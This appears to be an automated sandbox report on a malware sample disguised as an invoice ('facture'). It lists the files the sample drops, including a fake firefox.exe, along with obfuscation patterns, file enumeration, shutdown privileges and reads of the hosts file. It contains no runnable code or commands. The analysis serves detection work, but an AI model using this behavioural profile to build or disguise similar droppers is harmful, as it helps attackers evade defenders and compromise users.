Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcp140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\vcruntime140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\msvcr110.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\facture_1398665.exeFile created: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\ucrtbase.dllJump to dropped file

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004A1A3C LoadLibraryExW,LoadLibraryW,GetProcAddress
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_004064A8 push 0040650Dh; ret 2_2_00406505
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_004100D8 push 00410140h; ret 2_2_00410138
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0040E250 push 0040E27Ch; ret 2_2_0040E274
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_00406A50 push 00406A88h; ret 2_2_00406A80
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0040DD38 push 0040DD7Bh; ret 2_2_0040DD73
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0040B104 push 0040B2B0h; ret 2_2_0040B2A8
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0040E0D0 push 0040E118h; ret 2_2_0040E110
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_00406944 push 00406986h; ret 2_2_0040697E
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_00406A94 push 00406AC0h; ret 2_2_00406AB8
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_00411618 push 00411645h; ret 2_2_0041163D
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_00406A92 push 00406AC0h; ret 2_2_00406AB8
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_004034A8 push eax; ret 2_2_004034E4
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_004064A6 push 0040650Dh; ret 2_2_00406505
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0041157C push 004115FAh; ret 2_2_004115F2
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0040D034 push ecx; mov dword ptr [esp], eax 2_2_0040D039
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_004064A8 push 0040650Dh; ret 2_1_00406505
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_004100D8 push 00410140h; ret 2_1_00410138
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_0040E250 push 0040E27Ch; ret 2_1_0040E274
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_00406A50 push 00406A88h; ret 2_1_00406A80
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_0040DD38 push 0040DD7Bh; ret 2_1_0040DD73
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_0040B104 push 0040B2B0h; ret 2_1_0040B2A8
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_0040E0D0 push 0040E118h; ret 2_1_0040E110
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_00406944 push 00406986h; ret 2_1_0040697E
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_00406A94 push 00406AC0h; ret 2_1_00406AB8
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_00411618 push 00411645h; ret 2_1_0041163D
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_00406A92 push 00406AC0h; ret 2_1_00406AB8
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_004034A8 push eax; ret 2_1_004034E4
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_004064A6 push 0040650Dh; ret 2_1_00406505
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_0041157C push 004115FAh; ret 2_1_004115F2
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_0040D034 push ecx; mov dword ptr [esp], eax 2_1_0040D039
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_00500B48 push 00500BCEh; ret 3_2_00500BC6

Spreading:

Enumerates the file system
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Desktop\facture_1398665.exe | File opened: C:\Users\user~1\AppData\
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004D4F34 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004AD294 FindFirstFileW,GetLastError
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004FDF38 FindFirstFileW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004C0BC0 SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004BF43C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004C107C SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_004D4F34 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_004AD294 FindFirstFileW,GetLastError
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0FF154 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0FF033 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0FF27E _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0FEF1D _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E109748 _mbsdec_l,memset,FindFirstFileExA,FindClose,FindNextFileA,qsort
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E1098CF memset,FindFirstFileExW,FindClose,FindNextFileW,qsort
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_697C98CF memset,FindFirstFileExW,FindClose,FindNextFileW,qsort
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_697BEF1D _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_697C9748 _mbsdec_l,memset,FindFirstFileExA,FindClose,FindNextFileA,qsort
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_697BF27E _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_00383836 SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcat,SHFileOperation,FindNextFileA,SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrcat,CreateFileA,GetFileSize,ReadFile,lstrcat,lstrcat,StrStrA,lstrlen,WriteFile,lstrlen,WriteFile,??3@YAXPAX@Z,CloseHandle,FindNextFileA
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_0038364C SHGetFolderPathA,lstrcat,FindFirstFileA,lstrcmp,lstrcmp,lstrcpy,lstrlen,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcat,SHFileOperation,DeleteFileA,FindNextFileA
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_00382F10 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA

System Summary:

Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004808CC CreateFileW,DeviceIoControl,GetLastError,CloseHandle,SetLastError
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_01373985 _wcsdup,_wcsdup,free,_wcsdup,CreateProcessAsUserW,GetLastError,AssignProcessToJobObject,GetLastError,TerminateProcess,SetThreadToken,GetLastError,TerminateProcess,GetLastError,TerminateProcess,GetLastError,TerminateProcess,free
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0040E538 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_0040E538 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004B00AC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_004B00AC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Creates mutexes
Source: C:\Windows\System32\dllhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\F48A04623C4E0000
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697BADC95_2_697BADC9
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69799FE05_2_69799FE0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_6978BE145_2_6978BE14
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697966D05_2_697966D0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697919F05_2_697919F0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697697BB5_2_697697BB
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_6979A6A05_2_6979A6A0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69767ACD5_2_69767ACD
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69796AB05_2_69796AB0
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697875505_2_69787550
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697FF9735_2_697FF973
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69777F605_2_69777F60
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697FF5405_2_697FF540
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_6977B56A5_2_6977B56A
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_6976763C5_2_6976763C
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_69779D005_2_69779D00
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 5_2_697977705_2_69797770
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exeCode function: 6_2_0038A1996_2_0038A199
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: String function: 6E0D56D0 appears 250 times
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: String function: 6E0B5E30 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: String function: 6E0B0FF0 appears 215 times
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: String function: 00404C88 appears 72 times
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: String function: 69775E30 appears 42 times
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: String function: 69770FF0 appears 275 times
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: String function: 69795730 appears 34 times
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: String function: 00382481 appears 313 times
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: String function: 697956D0 appears 297 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 00406914 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 0049EE30 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 00409620 appears 203 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 0040C24C appears 81 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 00487C88 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 00406448 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 004155D4 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 0040E258 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 004ADAE0 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 004B2E4C appears 103 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 00409600 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 00406438 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 004B2BC8 appears 177 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 00405A34 appears 272 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 0049EB4C appears 47 times
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: String function: 004064D4 appears 31 times
PE file contains executable resources (Code or Archives)
Source: facture_1398665.tmp.2.dr | Static PE information: Resource name: RT_STRING type: ump; Hitachi SH big-endian COFF object, not stripped
Source: facture_1398665.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: ump; PE32+ executable for MS Windows (console) Mono/.Net assembly
Source: facture_1398665.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: ump; PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
PE file contains strange resources
Source: facture_1398665.exe | Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: facture_1398665.exe | Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: facture_1398665.tmp.2.dr | Static PE information: Resource name: RT_BITMAP type: ump; GLS_BINARY_LSB_FIRST
Source: facture_1398665.tmp.2.dr | Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: facture_1398665.tmp.2.dr | Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
PE file does not import any functions
Source: is-IEU03.tmp.3.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.4.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.4.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.4.dr | Static PE information: No import functions for PE file found
Source: is-HRJGD.tmp.3.dr | Static PE information: No import functions for PE file found
Source: is-NOVNE.tmp.3.dr | Static PE information: No import functions for PE file found
Reads the hosts file
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\dllhost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\dllhost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample file name differs from the original file name gathered from version info
Source: facture_1398665.exe, 00000002.00000002.12842058384.001F0000.00000002.sdmp | Binary or memory string: OriginalFilenamenetmsg.DLLj% vs facture_1398665.exe
Source: facture_1398665.exe, 00000002.00000002.12842575558.01290000.00000008.sdmp | Binary or memory string: OriginalFilenameKernelbasej% vs facture_1398665.exe
Source: facture_1398665.exe, 00000002.00000002.12843282025.01350000.00000008.sdmp | Binary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs facture_1398665.exe
Source: facture_1398665.exe, 00000002.00000003.12809044783.01380000.00000004.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs facture_1398665.exe
Sample reads its own file content
Source: C:\Users\user\Desktop\facture_1398665.exe | File read: C:\Users\user\Desktop\facture_1398665.exe
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)
Source: firefox.exe.4.dr | Binary string: r@P\FLASHTMP.TMPvector<T> too longBLOCKEDBroker ALLOWEDNtQuerySectionntdll.dllz:\build\build\src\security\sandbox\chromium\base/numerics/safe_math.hmap/set<T> too longz:/build/build/src/security/sandbox/chromium/base/threading/thread_local_storage.cckernel32.dllInitializeProcThreadAttributeListUpdateProcThreadAttributeDeleteProcThreadAttributeListGetProductInfoIsWow64Processz:/build/build/src/security/sandbox/chromium/sandbox/win/src/broker_services.cc_TargetNtCreateFile@48NtCreateFile_TargetNtOpenFile@28NtOpenFile_TargetNtQueryAttributesFile@12NtQueryAttributesFile_TargetNtQueryFullAttributesFile@12NtQueryFullAttributesFile_TargetNtSetInformationFile@24NtSetInformationFilentdll.dll*\/?/?\*\/?/?\*~*\Device\\??\g_handles_to_closeKeyNtQueryObjectFileEventz:/build/build/src/security/sandbox/chromium/sandbox/win/src/handle_closer_agent.ccALPC PortDuplicateHandlesize <= kAllocGranularityg_interceptionsz:/build/build/src/security/sandbox/chromium/sandbox/win/src/interception.cc_TargetNtMapViewOfSection@44_TargetNtUn
Source: firefox.exe.4.dr | Binary string: \??\\Device\ntdll.dlldependentlibs.list.gtest
Classification label
